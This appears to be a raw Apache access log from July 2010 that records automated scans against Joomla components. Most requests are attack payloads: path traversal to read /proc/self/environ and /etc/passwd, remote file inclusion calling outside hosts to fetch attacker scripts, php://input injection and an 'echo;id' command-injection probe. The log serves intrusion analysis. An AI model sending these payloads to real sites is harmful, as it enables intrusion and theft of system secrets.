216.227.214.212 - - [26/Jul/2010:00:34:28 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:34:28 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:34:28 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
94.247.177.18 - - [26/Jul/2010:01:13:57 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
174.120.237.175 - - [26/Jul/2010:01:14:13 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
113.30.66.24 - - [26/Jul/2010:01:15:52 +0200] "GET /logs//include/admin.lib.inc.php?site_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
113.30.66.24 - - [26/Jul/2010:01:15:52 +0200] "GET /logs/access_log%20%20//include/admin.lib.inc.php?site_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
113.30.66.24 - - [26/Jul/2010:01:15:54 +0200] "GET //include/admin.lib.inc.php?site_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
202.160.123.72 - - [26/Jul/2010:01:17:01 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
178.162.133.106 - - [26/Jul/2010:01:19:58 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.823"
94.247.177.18 - - [26/Jul/2010:01:24:25 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:24:25 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:24:25 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
178.162.133.106 - - [26/Jul/2010:01:26:04 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:26:05 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:26:05 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.823"
174.120.237.175 - - [26/Jul/2010:01:27:23 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:27:23 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:27:23 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
187.45.234.152 - - [26/Jul/2010:01:29:54 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
113.30.66.24 - - [26/Jul/2010:01:31:25 +0200] "GET /logs//include/admin.lib.inc.php?site_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
113.30.66.24 - - [26/Jul/2010:01:31:25 +0200] "GET //include/admin.lib.inc.php?site_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
187.45.234.152 - - [26/Jul/2010:01:34:32 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:34:32 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:34:32 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
202.160.123.72 - - [26/Jul/2010:01:37:01 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:01:37:01 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:01:37:02 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
188.72.70.56 - - [26/Jul/2010:01:40:56 +0200] "GET ///?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 666 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:42:09 +0200] "GET ///?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 666 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:42:14 +0200] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 802 "-" "Mozilla/5.0"
81.21.78.22 - - [26/Jul/2010:01:42:25 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:01:42:58 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:01:42:58 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:01:42:58 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
220.181.7.70 - - [26/Jul/2010:01:45:02 +0200] "GET / HTTP/1.1" 200 559 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.71 - - [26/Jul/2010:01:46:36 +0200] "GET / HTTP/1.1" 200 559 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
70.36.101.58 - - [26/Jul/2010:01:46:45 +0200] "GET / HTTP/1.1" 200 559 "-" "Wget/1.9+cvs-stable (Red Hat modified)"
187.45.234.152 - - [26/Jul/2010:01:48:07 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:48:09 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.72.70.56 - - [26/Jul/2010:01:55:13 +0200] "GET //index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:15 +0200] "GET /logs/access_log%20%20//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:15 +0200] "GET //index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:15 +0200] "GET /logs//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:18 +0200] "GET /logs/access_log%20%20//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:18 +0200] "GET /logs//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
216.14.114.38 - - [26/Jul/2010:02:04:27 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:04:33 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
187.45.234.152 - - [26/Jul/2010:02:12:43 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:12:44 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:12:44 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:12:48 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:12:49 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:12:49 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
216.14.114.38 - - [26/Jul/2010:02:28:31 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:28:31 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:28:31 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:28:31 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:28:31 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:28:31 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
83.169.23.182 - - [26/Jul/2010:02:38:12 +0200] "GET /logs/*.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:02:38:12 +0200] "GET /*.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.808"
174.121.93.221 - - [26/Jul/2010:02:42:06 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:42:07 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:02:42:43 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
174.121.93.221 - - [26/Jul/2010:02:52:29 +0200] "GET /logs/access_log/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:52:29 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:52:30 +0200] "GET /logs/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:52:32 +0200] "GET /logs/access_log/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:52:32 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:52:32 +0200] "GET /logs/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:02:56:40 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:29:08 +0200] "GET /logs/access_log/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:29:09 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:29:10 +0200] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:03:37:20 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:03:37:20 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:03:37:20 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:03:37:20 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:03:37:36 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:03:37:36 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:41:55 +0200] "GET /logs/access_log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:41:56 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:41:56 +0200] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
112.104.57.22 - - [26/Jul/2010:03:47:35 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:47:36 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:47:36 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
94.247.176.194 - - [26/Jul/2010:04:04:35 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:04:04:36 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:04:05:05 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:04:05:05 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:04:05:43 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:04:05:43 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
207.46.13.89 - - [26/Jul/2010:04:08:26 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.6.98.41 - - [26/Jul/2010:04:09:21 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:09:21 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:09:41 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
207.46.13.89 - - [26/Jul/2010:04:13:28 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
112.104.57.22 - - [26/Jul/2010:04:23:41 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:23:41 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:23:42 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:23:46 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:23:46 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:23:47 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:24:16 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:24:17 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:24:17 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
72.52.102.33 - - [26/Jul/2010:04:27:21 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4"
67.195.112.178 - - [26/Jul/2010:04:31:16 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.178 - - [26/Jul/2010:04:31:16 +0200] "GET /logs/?C=N;O=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.67.226 - - [26/Jul/2010:04:34:40 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:04:34:40 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:04:35:01 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:04:35:01 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:04:35:09 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:04:35:10 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
83.165.195.143 - - [26/Jul/2010:04:51:48 +0200] "GET /logs/access_log HTTP/1.0" 200 23373 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
213.215.178.34 - - [26/Jul/2010:04:56:10 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:04:56:23 +0200] "GET /logs/access_log/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:04:56:23 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:04:56:23 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:11 +0200] "POST /index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:14 +0200] "POST /logs/index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:14 +0200] "POST /index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:32 +0200] "POST /logs/access_log/index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:33 +0200] "POST /index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:33 +0200] "POST /logs/index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.41.204.220 - - [26/Jul/2010:05:02:49 +0200] "GET /logs//?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.813"
78.41.204.220 - - [26/Jul/2010:05:02:50 +0200] "GET //?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.813"
67.195.112.178 - - [26/Jul/2010:05:04:59 +0200] "GET /?C=M;O=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.178 - - [26/Jul/2010:05:06:30 +0200] "GET /?C=M;O=D HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.215.178.34 - - [26/Jul/2010:05:14:35 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:35 +0200] "GET /index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
